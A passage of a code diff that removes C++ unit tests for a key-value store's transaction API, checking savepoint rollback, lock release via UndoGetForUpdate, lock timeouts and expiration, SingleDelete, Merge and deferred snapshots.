-  txn->DisableIndexing();
-
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  Iterator* iter = txn->GetIterator(read_options);
-  ASSERT_OK(iter->status());
-
-  iter->Seek("B");
-  ASSERT_OK(iter->status());
-  ASSERT_FALSE(iter->Valid());
-
-  s = txn->Delete("A");
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  txn->EnableIndexing();
-
-  s = txn->Put("B", "bb");
-  ASSERT_OK(s);
-
-  iter->Seek("B");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("bb", iter->value().ToString());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("bb", value);
-
-  s = txn->Put("A", "aa");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  delete iter;
-  delete txn;
-}
-
-TEST_P(TransactionTest, SavepointTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn->SetSavePoint();  // 1
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(1, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  delete txn;
-  txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("B", "bb");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "c");
-  ASSERT_OK(s);
-
-  txn->SetSavePoint();  // 2
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "cc");
-  ASSERT_OK(s);
-
-  s = txn->Put("D", "d");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(5, txn->GetNumPuts());
-  ASSERT_EQ(1, txn->GetNumDeletes());
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 2
-
-  ASSERT_EQ(3, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("bb", value);
-
-  s = txn->Get(read_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(5, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  txn->Rollback();
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "aa");
-  ASSERT_OK(s);
-
-  s = txn->Put("F", "f");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(2, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  txn->SetSavePoint();  // 3
-  txn->SetSavePoint();  // 4
-
-  s = txn->Put("G", "g");
-  ASSERT_OK(s);
-
-  s = txn->SingleDelete("F");
-  ASSERT_OK(s);
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = txn->Get(read_options, "F", &value);
-  // According to db.h, doing a SingleDelete on a key that has been
-  // overwritten will have undefinied behavior.  So it is unclear what the
-  // result of fetching "F" should be. The current implementation will
-  // return NotFound in this case.
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  ASSERT_EQ(3, txn->GetNumPuts());
-  ASSERT_EQ(2, txn->GetNumDeletes());
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 3
-
-  ASSERT_EQ(2, txn->GetNumPuts());
-  ASSERT_EQ(0, txn->GetNumDeletes());
-
-  s = txn->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = txn->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = db->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = db->Get(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, SavepointTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  Status s;
-
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->Put("A", "");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 1
-
-  s = txn1->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn1->Put("C", "c");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 2
-
-  s = txn1->Put("A", "a");
-  ASSERT_OK(s);
-  s = txn1->Put("B", "b");
-  ASSERT_OK(s);
-
-  ASSERT_OK(txn1->RollbackToSavePoint());  // Rollback to 2
-
-  // Verify that "A" and "C" is still locked while "B" is not
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn2->Put("A", "a2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b2");
-  ASSERT_OK(s);
-
-  s = txn1->Put("A", "aa");
-  ASSERT_OK(s);
-  s = txn1->Put("B", "bb");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn1->Put("A", "aaa");
-  ASSERT_OK(s);
-  s = txn1->Put("B", "bbb");
-  ASSERT_OK(s);
-  s = txn1->Put("C", "ccc");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();                    // 3
-  ASSERT_OK(txn1->RollbackToSavePoint());  // Rollback to 3
-
-  // Verify that "A", "B", "C" are still locked
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn2->Put("A", "a2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c2");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  ASSERT_OK(txn1->RollbackToSavePoint());  // Rollback to 1
-
-  // Verify that only "A" is locked
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_OK(s);
-  s = txn2->Put("C", "c3po");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  // Verify "A" "C" "B" are no longer locked
-  s = txn2->Put("A", "a4");
-  ASSERT_OK(s);
-  s = txn2->Put("B", "b4");
-  ASSERT_OK(s);
-  s = txn2->Put("C", "c4");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-}
-
-TEST_P(TransactionTest, UndoGetForUpdateTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  txn1->UndoGetForUpdate("A");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-
-  txn1->UndoGetForUpdate("A");
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Verify that A is locked
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->UndoGetForUpdate("A");
-
-  // Verify that A is now unlocked
-  s = txn2->Put("A", "a2");
-  ASSERT_OK(s);
-  txn2->Commit();
-  delete txn2;
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a2", value);
-
-  s = txn1->Delete("A");
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->Put("B", "b3");
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-
-  // Verify that A and B are still locked
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a4");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b4");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->Rollback();
-  delete txn1;
-
-  // Verify that A and B are no longer locked
-  s = txn2->Put("A", "a5");
-  ASSERT_OK(s);
-  s = txn2->Put("B", "b5");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  delete txn2;
-  ASSERT_OK(s);
-
-  txn1 = db->BeginTransaction(write_options, txn_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_OK(s);
-  s = txn1->Put("B", "b5");
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("X");
-
-  // Verify A,B,C are locked
-  txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a6");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Delete("B");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c6");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("X", "x6");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("X");
-
-  // Verify A,B are locked and C is not
-  s = txn2->Put("A", "a6");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Delete("B");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c6");
-  ASSERT_OK(s);
-  s = txn2->Put("X", "x6");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("X");
-
-  // Verify B is locked and A and C are not
-  s = txn2->Put("A", "a7");
-  ASSERT_OK(s);
-  s = txn2->Delete("B");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c7");
-  ASSERT_OK(s);
-  s = txn2->Put("X", "x7");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-}
-
-TEST_P(TransactionTest, UndoGetForUpdateTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "A", "");
-  ASSERT_OK(s);
-
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->Put("F", "f");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 1
-
-  txn1->UndoGetForUpdate("A");
-
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->GetForUpdate(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->Put("E", "e");
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "E", &value);
-  ASSERT_OK(s);
-
-  s = txn1->GetForUpdate(read_options, "F", &value);
-  ASSERT_OK(s);
-
-  // Verify A,B,C,D,E,F are still locked
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  s = txn2->Put("A", "a1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e1");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f1");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("E");
-
-  // Verify A,B,D,E,F are still locked and C is not.
-  s = txn2->Put("A", "a2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f2");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c2");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 2
-
-  s = txn1->Put("H", "h");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("D");
-  txn1->UndoGetForUpdate("E");
-  txn1->UndoGetForUpdate("F");
-  txn1->UndoGetForUpdate("G");
-  txn1->UndoGetForUpdate("H");
-
-  // Verify A,B,D,E,F,H are still locked and C,G are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("H", "h3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-
-  txn1->RollbackToSavePoint();  // rollback to 2
-
-  // Verify A,B,D,E,F are still locked and C,G,H are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("D", "d3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("D");
-  txn1->UndoGetForUpdate("E");
-  txn1->UndoGetForUpdate("F");
-  txn1->UndoGetForUpdate("G");
-  txn1->UndoGetForUpdate("H");
-
-  // Verify A,B,E,F are still locked and C,D,G,H are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("E", "e3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("D", "d3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  txn1->RollbackToSavePoint();  // rollback to 1
-
-  // Verify A,B,F are still locked and C,D,E,G,H are not.
-  s = txn2->Put("A", "a3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("B", "b3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("D", "d3");
-  ASSERT_OK(s);
-  s = txn2->Put("E", "e3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("B");
-  txn1->UndoGetForUpdate("C");
-  txn1->UndoGetForUpdate("D");
-  txn1->UndoGetForUpdate("E");
-  txn1->UndoGetForUpdate("F");
-  txn1->UndoGetForUpdate("G");
-  txn1->UndoGetForUpdate("H");
-
-  // Verify F is still locked and A,B,C,D,E,G,H are not.
-  s = txn2->Put("F", "f3");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Put("A", "a3");
-  ASSERT_OK(s);
-  s = txn2->Put("B", "b3");
-  ASSERT_OK(s);
-  s = txn2->Put("C", "c3");
-  ASSERT_OK(s);
-  s = txn2->Put("D", "d3");
-  ASSERT_OK(s);
-  s = txn2->Put("E", "e3");
-  ASSERT_OK(s);
-  s = txn2->Put("G", "g3");
-  ASSERT_OK(s);
-  s = txn2->Put("H", "h3");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TimeoutTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  delete db;
-  db = nullptr;
-
-  // transaction writes have an infinite timeout,
-  // but we will override this when we start a txn
-  // db writes have infinite timeout
-  txn_db_options.transaction_lock_timeout = -1;
-  txn_db_options.default_lock_timeout = -1;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-  assert(db != nullptr);
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  TransactionOptions txn_options0;
-  txn_options0.expiration = 100;  // 100ms
-  txn_options0.lock_timeout = 50;  // txn timeout no longer infinite
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options0);
-
-  s = txn1->GetForUpdate(read_options, "aaa", nullptr);
-  ASSERT_OK(s);
-
-  // Conflicts with previous GetForUpdate.
-  // Since db writes do not have a timeout, this should eventually succeed when
-  // the transaction expires.
-  s = db->Put(write_options, "aaa", "xxx");
-  ASSERT_OK(s);
-
-  ASSERT_GE(txn1->GetElapsedTime(),
-            static_cast<uint64_t>(txn_options0.expiration));
-
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsExpired());  // expired!
-
-  s = db->Get(read_options, "aaa", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("xxx", value);
-
-  delete txn1;
-  delete db;
-
-  // transaction writes have 10ms timeout,
-  // db writes have infinite timeout
-  txn_db_options.transaction_lock_timeout = 50;
-  txn_db_options.default_lock_timeout = -1;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, &db);
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  TransactionOptions txn_options;
-  txn_options.expiration = 100;  // 100ms
-  txn1 = db->BeginTransaction(write_options, txn_options);
-
-  s = txn1->GetForUpdate(read_options, "aaa", nullptr);
-  ASSERT_OK(s);
-
-  // Conflicts with previous GetForUpdate.
-  // Since db writes do not have a timeout, this should eventually succeed when
-  // the transaction expires.
-  s = db->Put(write_options, "aaa", "xxx");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_NOK(s);  // expired!
-
-  s = db->Get(read_options, "aaa", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("xxx", value);
-
-  delete txn1;
-  txn_options.expiration = 6000000;  // 100 minutes
-  txn_options.lock_timeout = 1;      // 1ms
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  txn1->SetLockTimeout(100);
-
-  TransactionOptions txn_options2;
-  txn_options2.expiration = 10;  // 10ms
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options2);
-  ASSERT_OK(s);
-
-  s = txn2->Put("a", "2");
-  ASSERT_OK(s);
-
-  // txn1 has a lock timeout longer than txn2's expiration, so it will win
-  s = txn1->Delete("a");
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  // txn2 should be expired out since txn1 waiting until its timeout expired.
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsExpired());
-
-  delete txn1;
-  delete txn2;
-  txn_options.expiration = 6000000;  // 100 minutes
-  txn1 = db->BeginTransaction(write_options, txn_options);
-  txn_options2.expiration = 100000000;
-  txn2 = db->BeginTransaction(write_options, txn_options2);
-
-  s = txn1->Delete("asdf");
-  ASSERT_OK(s);
-
-  // txn2 has a smaller lock timeout than txn1's expiration, so it will time out
-  s = txn2->Delete("asdf");
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Put("asdf", "asdf");
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "asdf", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("asdf", value);
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, SingleDeleteTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = db->BeginTransaction(write_options);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  txn = db->BeginTransaction(write_options);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn = db->BeginTransaction(write_options);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-  txn2->SetSnapshot();
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("A", "a2");
-  ASSERT_OK(s);
-
-  s = txn->SingleDelete("A");
-  ASSERT_OK(s);
-
-  s = txn->SingleDelete("B");
-  ASSERT_OK(s);
-
-  // According to db.h, doing a SingleDelete on a key that has been
-  // overwritten will have undefinied behavior.  So it is unclear what the
-  // result of fetching "A" should be. The current implementation will
-  // return NotFound in this case.
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn2->Put("B", "b");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  // According to db.h, doing a SingleDelete on a key that has been
-  // overwritten will have undefinied behavior.  So it is unclear what the
-  // result of fetching "A" should be. The current implementation will
-  // return NotFound in this case.
-  s = db->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-}
-
-TEST_P(TransactionTest, MergeTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, TransactionOptions());
-  ASSERT_TRUE(txn);
-
-  s = db->Put(write_options, "A", "a0");
-  ASSERT_OK(s);
-
-  s = txn->Merge("A", "1");
-  ASSERT_OK(s);
-
-  s = txn->Merge("A", "2");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Merge("A", "3");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  TransactionOptions txn_options;
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  // verify that txn has "A" locked
-  s = txn2->Merge("A", "4");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a,3", value);
-}
-
-TEST_P(TransactionTest, DeferSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "A", "a0");
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  txn1->SetSnapshotOnNextOperation();
-  auto snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot);
-
-  s = txn2->Put("A", "a2");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  // Should not conflict with txn2 since snapshot wasn't set until
-  // GetForUpdate was called.
-  ASSERT_OK(s);
-  ASSERT_EQ("a2", value);
-
-  s = txn1->Put("A", "a1");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "B", "b0");
-  ASSERT_OK(s);
-
-  // Cannot lock B since it was written after the snapshot was set
-  s = txn1->Put("B", "b1");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a1", value);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
